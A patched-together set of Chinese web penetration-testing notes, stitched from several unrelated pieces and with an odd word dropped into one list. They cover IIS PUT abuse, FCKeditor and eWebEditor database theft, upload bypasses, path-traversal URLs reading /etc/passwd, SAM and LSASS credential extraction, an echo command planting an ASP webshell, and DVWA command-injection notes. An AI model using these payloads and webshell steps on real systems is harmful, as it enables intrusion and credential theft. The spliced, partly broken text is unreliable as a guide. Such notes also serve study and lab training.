一次WEB服务器渗透测试笔记

合集下载

渗透测试笔记

渗透测试笔记

渗透测试笔记一、渗透测试概述渗透测试是一种安全评估方法,通过对目标系统进行模拟攻击,以检测潜在的安全漏洞和弱点。

这种测试旨在帮助组织了解其网络和应用程序的脆弱性,并采取适当的措施来加强安全防护。

二、渗透测试流程1. 确定目标:明确渗透测试的目标系统、应用程序或网络范围。

2. 收集信息:通过搜索引擎、公开数据库和其他渠道收集目标的相关信息。

3. 漏洞扫描:使用专业的工具对目标进行漏洞扫描,发现潜在的安全漏洞。

4. 漏洞验证:验证扫描结果中的漏洞是否真实存在,并进行漏洞利用。

5. 报告编写:将渗透测试的结果以报告的形式呈现,包括漏洞描述、漏洞利用方法和建议的修复措施。

三、渗透测试工具1. Nmap:一款开源的网络扫描工具,用于发现目标主机和服务。

2. Metasploit:一款开源的渗透测试框架,提供丰富的漏洞利用模块和攻击载荷。

3. Burp Suite:一款商业的Web应用程序安全测试工具,支持自动化扫描和漏洞利用。

4. SQLMap:一款开源的SQL注入和数据库入侵工具。

5. Nessus:一款商业的漏洞扫描工具,提供全面的安全评估功能。

四、渗透测试注意事项1. 遵守法律法规:在进行渗透测试前,确保获得合法的授权和许可。

2. 安全意识:在进行渗透测试时,保持高度警惕,避免对非目标系统造成损害。

3. 文档记录:详细记录渗透测试的过程和结果,以便后续分析和修复。

4. 报告提交:将渗透测试报告提交给相关人员,以便及时采取修复措施。

五、总结渗透测试是评估组织安全防护能力的重要手段之一。

通过模拟攻击和漏洞扫描,可以发现潜在的安全风险和弱点,为组织提供有针对性的修复建议。

在进行渗透测试时,应遵守法律法规,保持安全意识,并详细记录测试过程和结果。

同时,及时提交报告给相关人员,以便采取有效的修复措施来加强组织的安全防护能力。

渗透检测实训心得

渗透检测实训心得

渗透检测实训心得一、实训背景本次实训是我在大学期间所参加的一次渗透检测实训,旨在通过实践操作,深入了解网络安全和渗透测试的相关知识和技能。

二、实训内容1. 理论学习在开始实践之前,我们先进行了一些理论学习,包括网络安全基础、渗透测试流程、常见漏洞类型和利用方法等。

通过这些学习,我们对渗透测试有了更深入的了解,并为后续实践打下了基础。

2. 实践操作接下来是最重要的一部分——实践操作。

我们使用了多种工具进行渗透测试,包括Nmap、Metasploit、Burp Suite等。

通过对目标系统进行扫描和漏洞利用,我们成功地获取了管理员权限,并获取了目标系统中的敏感信息。

3. 报告撰写完成实践后,我们需要撰写报告。

在报告中,我们详细记录了整个渗透测试过程中所采用的工具和方法,并对发现的漏洞进行了分析和总结。

这个过程不仅帮助我们深化对渗透测试知识的理解,还提高了我们的报告撰写能力。

三、心得体会1. 实践是最重要的通过这次实训,我深刻认识到实践的重要性。

虽然理论知识很重要,但只有通过实践操作才能真正掌握和应用这些知识。

在实践中,我们不仅能够更深入地理解渗透测试的流程和方法,还能够发现一些理论上不容易想到的问题。

2. 团队合作很关键在实践过程中,我们需要进行团队合作。

每个人都有自己的专长和优势,只有充分发挥团队成员的优势才能取得最好的效果。

同时,在团队合作中,我们也需要学会有效沟通和协调。

3. 报告撰写也很重要完成实践后,我们需要撰写报告。

这个过程不仅是对整个实践过程的总结和梳理,还是对我们报告撰写能力的锻炼。

一个好的报告应该清晰明了、详尽全面,并且具备可读性。

四、总结通过这次渗透检测实训,我不仅学到了很多渗透测试相关知识和技能,还提高了自己的团队协作和报告撰写能力。

我相信这些经验和技能将对我未来的职业发展有很大帮助。

渗透测试笔记

渗透测试笔记

一. IISPUT写权限利用工具1.1 准备:put.txt 文本为小马的脚本代码!根据实际情况更改,HOST值和put的文件名字!需要上传woqu.txt!copy.txt 此文本作用为将上传的woqu.txt更改为woqu.asp。

然后访问!1.2 步骤:1.2.1 查看NC可使用操作!1.2.2 上传woqu.txt!1.2.3 使用copy工具将上传上去的woqu.txt改为woqu.asp1.2.4 然后访问!没改成功,可能环境不对!手动把woqu.txt,改为woqu.asp!1.2.5 5.上传大马!将大马源文件复制进去!保存!1.2.6 6.应该可以登录木马!!注意:除了这种方式,还有软件方式上传!!!工具:对IIS写权限的利用-桂林老兵作品IISPUTSCANNER.EXE 检查是否有写权限!二. COOKIE利用查看cookie 内容即为cookies的值!删除cookie!退出,然后重新打开网页,输入cookie值!即可登录!FCeditor漏洞利用http://10.0.0.6:86/Include/FCKeditor/editor/filemanager/connectors/test.html此网页是在测试时使用的,很多网站搭建起来之后,忘记删除,就有了这个漏洞!访问网址:填写mm.asp创建文件夹nn.asp上传oo.txt文件!查看路径:/Upload/file/mm.asp,然后访问!访问mm.asp,然后利用此小马,上传大马!三. Ewebeditor利用破解MD5密码网站在实验的时候,发现了一个网站存在此漏洞!此漏洞就是,可以直接下载数据库!在网址后面跟上/ewebeditor/db/ewebedirot.mdb http://10.0.0.8/ewebeditor/db/ewebeditor.mdb下载号数据库之后,用辅臣数据库浏览器,打开数据库!查看用户名,密码!!都是加密的,破解吧!登录!http://10.0.0.8/ewebeditor/admin_login.asp关键字:inurl:job_select.aspinurl:product_read.asp?Shop_id=后台:admin/ewebeditor/admin_login.asp数据库:admin/ewebeditor/db/ewebeditor.mdbhttp://10.0.0.111/phppaleo/index.php?lang=../../../../../../../etc/passwd%0http://10.0.0.111/phppaleo/index.php?lang=../../../../../../usr/local/apache2/conf/httd.conf%0?? ??四. 上传漏洞由于合法性校验不严,造成此漏洞!查看http://10.0.0.6:93/system/upload_photo.php?PhotoUrlID=1的源文件!把jpg改成asp,,,,可以上传asp文件!更改路径,将路径更改为如下图所示!然后保存源码为网页形式!保存!访问保存好的网页1.html,运行1.html。

渗透测试笔记八

渗透测试笔记八

渗透测试笔记八在win系统中,控制用户登陆的系统进程是“winlogon.exe”,系统在每一个用户登陆时都会产生一个“winlogon.exe”进程。

通过查找这个进程访问的内存模块,可以获得保存在内存中的用户名和密码。

AD:渗透测试笔记主要为一些短小但又精华的渗透小技巧,旨在与小伙伴们分享学习心得。

为保证质量,每一篇为20条左右的渗透小记。

1、在win系统中,控制用户登陆的系统进程是winlogon.exe ,系统在每一个用户登陆时都会产生一个winlogon.exe 进程。

通过查找这个进程访问的内存模块,可以获得保存在内存中的用户名和密码。

2、Lsass.exe 是win下一个必不可少的进程,属于微软win系统中安全机制的相关进程,此进程主要用于本地安全和登陆策略,同时也管理域IP相关的安全信息。

可用LSASecretsView这个软件破之。

3、上手的时候,先搜搜有没有备份好的SAM文件。

例如管理员经常将重要的文件备份在c:\windows\repair或是c:\windows\backup下,如果找到,将省去大半的功夫。

4、有经验的管理员会使用C:\Windows\System32\syskey.exe这个小工具来对系统密码做双重加密,像bios密码一样加多一次防护。

5、跟SAM文件的防护机制一样,syskey.exe这个小工具也会生成一个类似的文件叫做system。

也在c:\windows\system32\config目录下。

可用SAMInside软件附带的一个小工具GetSyskey.exe 来抓取syskey。

6、对方开放42端口要特别留意,可能启用了WINS服务,进一步说明背后可能有着复杂的内网拓扑结构。

7、进行嗅探时,对网络结构布局的了解是必须的,否则嗅探很可能会失败。

常见的VLAN类型有以下几种:(1)基于高山茶 端口的VLAN.(2)基于MAC地址的VLAN.(3)基于路由的VLAN.(4)基于策略的VLAN.8、HTRAN、LCX等端口转发出不来被墙的一个解决办法猜想,可以看看对方的防火墙是什么牌子滴,下一个回来本地看看它升级的时候流量是从哪个端口出去的。

《Web安全攻防:渗透测试实战指南》笔记

《Web安全攻防:渗透测试实战指南》笔记

《Web安全攻防:渗透测试实战指南》阅读记录目录一、基础篇 (3)1.1 Web安全概述 (4)1.1.1 Web安全定义 (5)1.1.2 Web安全重要性 (6)1.2 渗透测试概述 (6)1.2.1 渗透测试定义 (8)1.2.2 渗透测试目的 (9)1.2.3 渗透测试流程 (9)二、技术篇 (11)2.1 Web应用安全检测 (12)2.1.1 SQL注入攻击 (14)2.1.2 跨站脚本攻击 (16)2.1.3 文件上传漏洞 (17)2.2 操作系统安全检测 (19)2.2.1 操作系统版本漏洞 (19)2.2.2 操作系统权限设置 (20)2.3 网络安全检测 (21)2.3.1 网络端口扫描 (23)2.3.2 网络服务识别 (24)三、工具篇 (25)3.1 渗透测试工具介绍 (27)3.2 工具使用方法与技巧 (28)3.2.1 Kali Linux安装与配置 (31)3.2.2 Metasploit使用入门 (31)3.2.3 Wireshark使用技巧 (33)四、实战篇 (34)4.1 企业网站渗透测试案例 (36)4.1.1 漏洞发现与利用 (37)4.1.2 后门植入与维持 (39)4.1.3 权限提升与横向移动 (40)4.2 网站安全加固建议 (41)4.2.1 参数化查询或存储过程限制 (42)4.2.2 错误信息处理 (44)4.2.3 输入验证与过滤 (45)五、法规与政策篇 (46)5.1 国家网络安全法规 (47)5.1.1 《中华人民共和国网络安全法》 (48)5.1.2 相关法规解读 (49)5.2 企业安全政策与规范 (50)5.2.1 企业信息安全政策 (52)5.2.2 安全操作规程 (53)六、结语 (54)6.1 学习总结 (55)6.2 深入学习建议 (57)一、基础篇在深入探讨Web安全攻防之前,我们需要了解一些基础知识。

Web 安全是指保护Web应用程序免受未经授权访问、篡改或泄露的过程。

web安全渗透测试培训安全测试总结

web安全渗透测试培训安全测试总结

web安全渗透测试培训安全测试总结跨站点脚本攻击(Xss)Burpsuite探测反射型xss问题请求的值没有做处理就在响应中返回越权访问定义:不同权限账户之间的功能及数据存在越权访问。

测试方法:1.抓取A用户功能链接,然后登录B用户对此链接进行访问。

2.抓取用户A的uesrid,用用户B登录时替换为用户A的userid。

3.抓取用户A的cookie,用用户B登录时替换用户A的cookie。

文上传漏洞定义:没有对上传文扩展名进行限制或者限制可以被绕过。

测试方法:找到系统中可以上传文的地方,抓取功能链接,修改文扩展名,看响应包的状态。

关键会话重放攻击定义:可以抓取包固定账号破解密码、固定密码破解账号和重放提交投票数据包。

测试方法:使用抓包工具抓取系统登录请求,获得用户和密码参数,使用用户或密码字典替代登录请求会话中对应的用户或密码参数,暴力破解。

中间weblogic命令执行漏洞定义:weblogic反序列化漏洞,可以执行系统命令。

测试方法:使用CVE-20XX-2628漏洞检测工具,对目标主机进行检测。

在url.txt中填入目标主机的“ip:port”,这里填入192.168.2.103:7001。

在windows主机打开命令行运行CVE-20XX-2628-MultiThreading.py开始检测。

敏感信息泄露定义:系统暴露系统内部信息,包括网站绝对路径泄露、SQL语句泄露、中间泄露、程序异常回显。

测试方法:1.使用抓包工具对系统中的参数进行篡改,加入特殊符号“’、--、&;”,查看返回数据包。

2.查看系统前端js代码。

SQL语句泄露中间版本泄露程序异常回显程序异常回显后台泄露漏洞中间后台泄露定义:weblogic后台地址过于简单,攻击者很容易猜测和破解到后台地址。

测试方法:1.不允许使用默认地址2.不允许只修改控制台访问地址的端口号3.系统地址后面加常用的后台地址访问,如manager、user、login、console等。

web应用渗透总结

web应用渗透总结

web应用渗透总结Web应用渗透测试是一种针对Web应用程序的安全评估方法,旨在发现潜在的安全漏洞和弱点,以确保应用程序的安全性和可靠性。

在进行Web应用渗透测试后,需要进行总结,以便更好地了解测试结果和制定相应的安全措施。

以下是一个Web应用渗透测试总结的示例:一、测试概述本次Web应用渗透测试的目标是评估应用程序的安全性,发现潜在的安全漏洞和弱点。

测试范围包括应用程序的所有功能和页面,以及与应用程序相关的网络基础设施。

二、测试方法本次测试采用了多种方法,包括但不限于:1. 手动测试:通过模拟用户行为,对应用程序进行深入的测试,包括输入验证、身份验证、授权等方面。

2. 自动测试:利用自动化工具对应用程序进行扫描,发现常见的安全漏洞和弱点。

3. 时间戳测试:通过检查应用程序的时间戳响应,发现潜在的漏洞和弱点。

4. 模糊测试:通过向应用程序发送随机或异常的数据,发现潜在的漏洞和弱点。

三、测试结果经过测试,我们发现以下安全漏洞和弱点:1. SQL注入漏洞:在用户登录页面存在SQL注入漏洞,攻击者可利用该漏洞获取敏感数据或执行恶意操作。

2. 跨站脚本攻击(XSS)漏洞:在用户个人信息页面存在XSS漏洞,攻击者可利用该漏洞在用户的浏览器中执行恶意脚本。

3. 未验证用户输入:在添加新用户功能中,未对用户输入进行验证,攻击者可利用该漏洞提交恶意数据或绕过身份验证。

4. 弱加密算法:在密码重置功能中,使用了弱加密算法,攻击者可利用该漏洞破解用户的密码。

四、建议措施针对以上安全漏洞和弱点,我们建议采取以下措施:1. 对所有用户输入进行验证和过滤,防止SQL注入攻击和XSS攻击。

2. 使用强加密算法对密码进行加密存储,提高密码的安全性。

3. 对敏感数据进行加密传输,确保数据在传输过程中的安全性。

4. 定期进行安全审计和漏洞扫描,及时发现和修复安全漏洞。

5. 加强安全培训和管理,提高开发人员的安全意识和技能水平。

渗透测试-php基础笔记总结

渗透测试-php基础笔记总结

渗透测试-php基础笔记总结1. 引言渗透测试是针对计算机系统、网络或应用程序的安全漏洞进行检测的一种安全评估活动。

在进行渗透测试时,掌握一定的编程语言知识可以提高测试的效率和准确性。

PHP作为一种常用的服务器端脚本语言,在渗透测试中有着重要的作用。

本文将对渗透测试中PHP基础知识进行总结和归纳,以供相关从业人员学习参考。

2. PHP基础知识2.1 PHP的概念PHP(Hypertext Preprocessor)是一种开源的服务器端脚本语言,特别适用于Web开发。

PHP脚本在服务器上执行,生成HTML文档并将其发送到浏览器。

它可以与HTML一起使用,也可以嵌入到HTML中。

PHP可以执行各种任务,如从表单收集数据、创建Cookie以及向数据库发送查询。

2.2 PHP基本语法PHP的基本语法与C语言和Perl类似。

PHP脚本在服务器上执行,所以您只需要在计算机上安装一个支持PHP的服务器,比如Apache、Nginx等。

PHP是一门强类型的语言,变量的数据类型是在声明时自动设置的。

PHP支持8种原始数据类型,包括四种标量类型(整型、浮点型、布尔型、字符串型)、两种复合类型(数组、对象)和两种特殊类型(资源、null)。

3. 渗透测试中的PHP应用3.1 渗透测试基础在进行渗透测试时,了解PHP的基本语法和常用函数是非常重要的。

渗透测试员需掌握PHP中的文件操作、数据库操作、网络操作、系统操作等方面的知识,以便能够充分利用PHP对目标系统进行测试。

3.2 文件操作在渗透测试中,文件操作是必不可少的一部分。

PHP提供了一系列文件处理函数,如文件的打开、读取、写入、关闭等。

渗透测试员可以利用PHP的文件操作函数进行文件的读取、修改、删除等操作,以测试目标系统的安全性。

3.3 数据库操作许多Web应用程序与数据库进行交互,因此在进行渗透测试时,了解PHP中的数据库操作是非常重要的。

PHP提供了丰富的数据库操作函数,如连接数据库、执行SQL语句、获取结果集等。

记一次内网渗透测试经历

记一次内网渗透测试经历

记⼀次内⽹渗透测试经历话说刚开始接触安全测试时,没有⼀个系统的概念,前辈仍⼀个内⽹测试⽹站,让我把的shell拿下来,那我就开始吭哧吭哧的⼲起来。

⾸先,做渗透测试要有个思路,不能埋头苦⼲。

所以就开始理了下思路,具体如下:1. 判断有⽆sql注⼊点,根据sql注⼊点来判断数据库类型,若是mssqlserver则查看存储过程xp_cmdshell 查看其是否被禁⽤,若没有被禁⽤,则直接在注⼊点后⾯直接使⽤xp_cmdshell 存储过程向系统中添加权限。

2. 判断是否有上传漏洞,主要是上传asp等⼀句话脚本,先得到webshell,然后利⽤webshell再获取系统shell。

3. 主要是利⽤sa,和第⼀种思路⼤致⼀样主要就这⼏种思路,下⾯就开始实施。

⾸先,针对思路⼀:既然是判断有⽆sql注⼊,最⽅便的⽅法当然是使⽤⼯具进⾏扫描,这⾥我使⽤的是webcruiser,⼀个⾮常⼩巧的⼯具,当然我这⾥肯定能够扫描出sql注⼊漏洞,接下来当然可以继续⽤这个⼯具得到数据库等信息,⽽我在这⾥就直接在该sql注⼊点是否能够执⾏xp_cmdshell。

具体⽅法是这样的:1. 确定数据库类型:Id=1234;and (select count(*) from sysobjects)>01. 得到当前连接名和数据库名,查看是否为sa连接。

id=1234;and user>0 (若显⽰dbo 则代表sa)。

id=1234;and db_name()>0,执⾏异常时,可以得到当前连接的数据库名。

1. 查看xp_cmdshell是否被禁⽤。

id=1234;and (select count(*) from master.dbo.sysobjects where xtype=”X” and name =’xp_cmdshell’)1. 若存储过程被删掉,则尝试恢复。

id=1234;and exec sp_addextendepro xp_cmdshell,’xplog70.dll’若出现下⾯的错误,可以尝试如下⽅法:l ⽆法装载 DLL xpsql70.dll 或该DLL 所引⽤的某⼀DLL。

网站入侵笔记,黑客渗透笔记,拿站思路

网站入侵笔记,黑客渗透笔记,拿站思路

已知程序--分析代码---漏洞利用---提权如:找到默认数据库下载-默认密码--进后台提权已知数据库ASA---一句话插入----提权末知程序--注入---用啊D加GOOGLE扫描注入点---ACC----猜管理员用户密码---进后台---利用后台某个扩展上传WEBSEHLL,---提权---MSSQL---SA+DB权限很容得到WEBSEHLL,不出意外拿下服务器也没问题。

PU权限比较低,猜密码进后台。

文本框注入---只要有参数的地方都可能有注入-----抓包分析----用工具注入跨站---吊管理员帐号--进后台----利用后台某个扩展上传WEBSEHLL----提权找后台---'or'='or' 'or''=' 加默认密码进后台----传WEBSEHLL---提权COOKIE欺骗----进后台---得WEBSEHLL----提权PHP包含----得WEBSEHLL----提权找上传地方----抓包分析----NC上传----得WEBSHELL---提权利用服务器一些特性,如PHP的phpMyAdmin,JSP的Tomcat等等。

社会工程学---得到此人一些相关信息---如生日、电话等等。

利用已知信息进入入侵,这个含义太广,大家自己发挥吧。

如果已上都不行,去查IP绑玉米的站,查IP绑多少玉米,一个个的网站看在用上面的方法去试。

如果服务器就一个站,或者其他站也都很安全,扫描C段21,找出SU版本低的,找到后去查IP绑多少玉米,一个个渗透,进去之后SU提权,PING ARP-A查是不是同网关,CAIN嗅探。

或抓HASH 破解,很可能是一个管理员管理的,如果是内网入侵域服务器,内网全部OK,这只是很常规的思路,在入侵的时候可能会遇到各种各样的困难,需要我们细心,还需要一些经验,同样的问题经验多的人就可以看出来,经验少的就发现不了。

有的时候社会工程学的利用也很关键。

渗透测试笔记

渗透测试笔记

渗透测试笔记渗透测试是指通过模拟攻击者的方式,对目标系统进行漏洞评估和安全弱点分析的过程。

以下是一份渗透测试笔记,记录了渗透测试的基本步骤、常用工具和技术以及一些注意事项。

第一部分:渗透测试概述渗透测试是一个有计划和系统的过程,旨在评估目标系统的安全性。

一个完整的渗透测试过程通常包括以下步骤:1.收集信息:收集目标系统的信息,包括IP地址、域名、开放端口、操作系统等。

可以通过搜索引擎、WHOIS查询、端口扫描等方式进行信息收集。

2.制定计划:根据收集到的信息确定渗透测试的目标、范围和方法。

明确测试的时间、地点和方式,制定详细的测试计划。

3.扫描和识别:通过扫描工具对目标系统进行漏洞扫描,识别系统中存在的安全弱点和漏洞。

常用的扫描工具包括Nessus、OpenVAS 等。

4.渗透测试:尝试利用已识别到的漏洞和弱点对目标系统进行攻击。

可以使用常见的攻击技术如SQL注入、跨站脚本(XSS)等。

5.社交工程:通过伪装、欺骗等手段获取目标系统的敏感信息。

常见的社交工程技术有钓鱼、假冒等。

6.提权和权限维持:在成功渗透系统后,尝试提升权限并保持长期控制。

常见的技术包括利用提权漏洞、后门等。

7.清理和报告:在完成测试后,清理所有留下的痕迹,并撰写详细的测试报告。

报告应包括测试的目的、过程、结果及建议等。

第二部分:常用渗透测试工具和技术1.网络扫描工具:用于扫描目标系统的开放端口和漏洞。

常用的工具有Nmap、Zmap等。

2.漏洞扫描工具:用于发现目标系统中存在的漏洞和弱点。

常见的工具有Acunetix、Nessus、OpenVAS等。

3.密码破解工具:用于暴力破解目标系统的登录密码。

常见的工具有John the Ripper、Hydra等。

4.社交工程工具:用于对目标系统进行社交工程攻击。

常见的工具有SET(Social-Engineer Toolkit)、Kali Linux中的工具等。

5.嗅探工具:用于捕获目标系统上的网络流量,获取敏感信息。

项目一网站系统渗透测试报告

项目一网站系统渗透测试报告

项目一网站系统渗透测试报告1. 概述本报告是针对项目一的网站系统进行的渗透测试的结果汇总和分析。

测试旨在评估系统的安全性,并发现可能存在的漏洞和风险,以便提供相应的修复建议。

2. 测试目标网站系统渗透测试的目标是发现系统中的安全漏洞和弱点,包括但不限于以下方面:- 身份验证和授权机制的弱点- 输入验证和数据处理的漏洞- 敏感信息的保护和加密- 配置错误和不安全的默认设置- 任何可能导致系统瘫痪或拒绝服务的漏洞3. 测试方法渗透测试是通过模拟真实黑客攻击的方式进行的,但在测试过程中会遵循合法和道德的原则。

测试方法包括但不限于以下几种:- 扫描和识别系统的漏洞和弱点- 尝试使用常见的攻击技术,如SQL注入、跨站脚本(XSS)攻击等- 尝试绕过身份验证和授权机制- 分析系统的配置和安全设置4. 测试结果在对项目一网站系统进行渗透测试后,我们发现以下漏洞和风险:- 存在未经身份验证的访问漏洞,可能导致未授权的用户访问敏感信息或执行未经授权的操作。

- 输入验证不完善,可能导致SQL注入攻击或跨站脚本(XSS)攻击。

- 敏感信息在传输过程中未加密,可能被窃听者获取。

- 配置错误导致系统暴露了敏感文件和目录,可能被攻击者利用。

- 系统的日志记录和监控机制不完善,可能无法及时发现和阻止恶意活动。

5. 修复建议基于以上的测试结果,我们建议项目一网站系统进行以下修复措施:- 强化身份验证和授权机制,确保只有经过授权的用户才能访问敏感信息和执行敏感操作。

- 加强输入验证,过滤和转义用户输入,以防止SQL注入和跨站脚本(XSS)攻击。

- 使用加密协议,如HTTPS,在数据传输过程中保护敏感信息的安全性。

- 审查和修复系统的配置错误,确保敏感文件和目录不被公开访问。

- 建立完善的日志记录和监控机制,及时发现和阻止异常活动。

6. 结论通过本次渗透测试,我们发现项目一网站系统存在一些安全漏洞和风险。

然而,通过采取相应的修复措施,系统的安全性可以得到提升。

WEB下渗透测试经验技巧(全)

WEB下渗透测试经验技巧(全)

WEB下渗透测试经验技巧(全)整理的:上传漏洞拿shell:1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell.2.就是在上传时在后缀后⾯加空格或者加⼏点,也许也会有惊奇的发现。

例:*.asp ,*.asp..。

3.利⽤双重扩展名上传例如:*.jpg.asa格式(也可以配上第⼆点⼀起利⽤)。

4.gif⽂件头欺骗5.同名重复上传也很OK。

:⼊侵渗透中⽤到的命令,语法:set,systeminfo,ipconfig,ping,利⽤这些命令可以收到⽐较多的系统信息tasklist /svc 查看服务对应的pidnetstat -ano,netstat -abnvfsutil.exe fsinfo drives 列出全部盘符dir d:\*conn*.* /s 找数据库连接⽂件telnet 218.25.88.234 3389 对外部是否开放了这个端⼝echo ^<%execute(request(“cmd”))%^> >>e:\k\X.asp 写⼀句话到e:\k\⽬录,密码为cmd.type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp 传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp注册表敏感信息:HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mysql 注册表位置HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 华众主机位置HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\ serv-u 位置HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端⼝HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters 1433端⼝HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\ 服务器ftp路径服务器⽇志⽂件物理路径:安全⽇志⽂件:%systemroot%\system32\config \SecEvent.EVT系统⽇志⽂件:%systemroot%\system32\config \SysEvent.EVT应⽤程序⽇志⽂件:%systemroot%\system32\config \AppEvent.EVTFTP连接⽇志和HTTPD事务⽇志:systemroot% \system32\LogFiles\,下⾯还有⼦⽂件夹,分别对应该FTP和Web服务的⽇志,其对应的后缀名为.Log。

(完整word)Web安全渗透测试(SSL)

(完整word)Web安全渗透测试(SSL)

企业级Web安全渗透测试之SSL篇一、简介目前,许多重要的Web服务都使用了SSL和TLS协议对通信进行保护.我们知道,http协议是使用明文进行传输的,但是像网络银行之类的web应用如果使用http协议的话,那么所有的机密信息都会暴露在网络连接中,这就像银行用一个透明的信封给我们邮寄信用卡帐号和密码一样,在从银行到达用户之间任何接触过这封信的人,都能看到我们的帐号和密码.为了提高其安全性,经常需要通过SSL或者TLS隧道传输这些明文,这样就产生了https通信流量。

例如网络银行之类的应用,在服务器和客户端之间传输密码,信用卡号码等重要信息时,都是通过https协议进行加密传送的。

SSL和TLS是两种安全协议,它们通过加密技术为传输的信息提供安全信道、机密性和身份验证等安全功能.我们知道由于对高级密码技术的出口限制,会造成遗留系统使用的是弱加密技术。

如果系统采用了弱密码,或者说密码强度过低的话,攻击者可以在有效的时间内破解密钥,而攻击者一旦得到了密钥,就像小偷得到了我们家的钥匙一样,所有的锁都会形同虚设。

但是,新Web服务器就不会使用弱加密系统了吗?答案是否定的,因为许多新Web服务器也经常被配置成处理虚密码选项.为了实现这些安全特性,协议必须确保使用的密码算法有足够的强度,并且密码算法得到了正确的实现。

即使服务器安装使用了高级的加密模块,但是如果配置不当的话,也有可能为安全特性要求较高的通信信道的设置了较弱的加密技术。

下面,我们将详细介绍如何对这两种协议的配置进行安全审计。

二、测试SSL/TLS的密码规范我们知道,http协议是使用明文进行传输的,为了提高其安全性,经常需要通过SSL或者TLS隧道传输这些明文,这样就产生了https通信流量.除对传输的数据进行加密处理之外,https(安全超文本传输协议,HTTPS)还能利用数字证书为服务器或客户端提供身份标识。

过去,美国政府对加密系统的出口有许多限制,如密钥长度最大为40位,因为密钥长度越短,它就越容易破解.后来,密码出口条例已经放宽了许多,但是,检查服务器的SSL配置仍然十分重要,因为它有可能配置使用了弱加密技术。

WEB安全渗透测试基础知识(一)

WEB安全渗透测试基础知识(一)

WEB安全渗透测试基础知识(一)1.1. Web技术演化1.1.1. 静态页面在互联网最初开始的时候,Web网站的主要内容是静态的,由文字和图片组成,制作和表现形式也是以表格为主。

当时的用户行为也非常简单,仅仅是浏览网页。

1.1.2. 多媒体阶段随着技术的不断发展,音频、视频、Flash等多媒体技术诞生了。

多媒体的加入使得网页变得更加生动形象,网页上的交互也给用户带来了更好的体验。

1.1.3. CGI阶段渐渐的,多媒体已经不能满足人们的请求,于是CGI(Common Gateway Interface)应运而生。

CGI定义了Web服务器与外部应用程序之间的通信接口标准,因此Web服务器可以通过CGI执行外部程序,让外部程序根据Web请求内容生成动态的内容。

在这个时候,各种编程语言如PHP/ASP/JSP也逐渐加入市场,基于这些语言可以实现更加模块化的、功能更强大的应用程序。

1.1.4. Ajax在开始的时候,用户提交整个表单后才能获取结果,用户体验极差。

于是Ajax(Asynchronous Javascript And XML)技术逐渐流行起来,它使得应用在不更新整个页面的前提下也可以获得或更新数据。

这使得Web应用程序更为迅捷地回应用户动作,并避免了在网络上发送那些没有改变的信息。

1.1.5. MVC随着Web应用开发越来越标准化,出现了MVC等思想。

MVC是Model/View/Control的缩写,Model用于封装数据和数据处理方法,视图View是数据的HTML展现,控制器Controller负责响应请求,协调Model和View。

Model,View和Controller的分开,是一种典型的关注点分离的思想,使得代码复用性和组织性更好,Web应用的配置性和灵活性也越来越好。

而数据访问也逐渐通过面向对象的方式来替代直接的SQL访问,出现了ORM(Object Relation Mapping)的概念。

从头开始的WEB渗透测试入门(一)——渗透测试基础

从头开始的WEB渗透测试入门(一)——渗透测试基础

从头开始的WEB渗透测试⼊门(⼀)——渗透测试基础前⾔:之前已经写过DVWA的教程,那是去年刚开始⼊门什么都想尝试,现在已经经过了半年多快⼀年的学习,现在正好碰上安恒的培训,就毫不犹豫的报名了,然后重新开学学习web渗透,现在其实也算是⼩⽩,所以会把⼤部分都记录下来,不单单是⼀个技术博客笔记。

⼀、⽹络安全法律法规⼆、渗透测试概述1.什么是渗透测试?(Penetration Testing)渗透测试是指渗透⼈员在不同的位置(⽐如从内⽹、从外⽹等位置)利⽤各种⼿段对某个特定⽹络进⾏测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给⽹络所有者。

⽹络所有者根据渗透⼈员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。

2.渗透测试分类?⿊盒测试、⽩盒测试。

这个很容易理解,就是有没有提前知道⼀些信息,估计是这些信息包含哪些,包含⽹络拓扑、应⽤、系统、源代码等。

3.渗透测试的流程?PTES(渗透测试执⾏标准:Penetration Testing Execution Standard)定义的渗透测试环节基本上反映了安全业界的普遍认同。

【此部分可以配合参考1⼀起看】3.1前期交互:3.2信息收集:3.3威胁建模:3.4漏洞分析:3.5渗透攻击:3.6后渗透攻击:(可以理解为内⽹渗透,就是打进内部站点之后利⽤跳板进⾏第⼆次攻击)3.7渗透报告:总结流程图:以上当然只是⼤致规划,并不⼀定真的是按这个顺序进⾏的。

4.⼀些基本概念POC、EXP、Payload分别是什么意思?5. 0day、1day、Nday分别是什么意思?0day,漏洞信息未公布时,此时EXP可以通杀;1day,漏洞信息被公布,但官⽅没有补丁或者修复⽅案,此时EXP可以⼊侵⼤部分系统;Nday,信息已有官⽅补丁或修复⽅案,此时EXP只能⼊侵未及时修复的系统;三、渗透测试基础四、本地攻击环境搭建参考Reference。

DVWA渗透笔记

DVWA渗透笔记

DVWA 渗透笔记Command InjectionLow渗透思路这道题⽬在之前的CTF 上也有出现过,可以使⽤来堆叠指令,的指令的回显也会直接显⽰在页⾯上。

后⾯想写⼊⼀句话⽊马,但是发现这个字段过滤了,也没法双写绕过,稍微查了⼀下Linux 的命令,发现可以使⽤awk 命令写⼊,payload 如下这个是全部⽤ASC 写⼊的,有点长,要视具体情况⽽定,根据这道题也可以简化⼀下Medium对&&和;进⾏了过滤渗透思路这个等级和Low 差不多,源代码是将&&和;替换成空,我们只要⽤管道符|同样可以执⾏命令。

payload 与Low 类似High渗透思路这个等级过滤了很多危险字符,但是有⼀个点就是过滤管道符的时候后⾯多了个空格,不知道是写DVWA 的时候疏忽还是故意就是这样的,所以管道符后⾯不加空格就可以直接绕过。

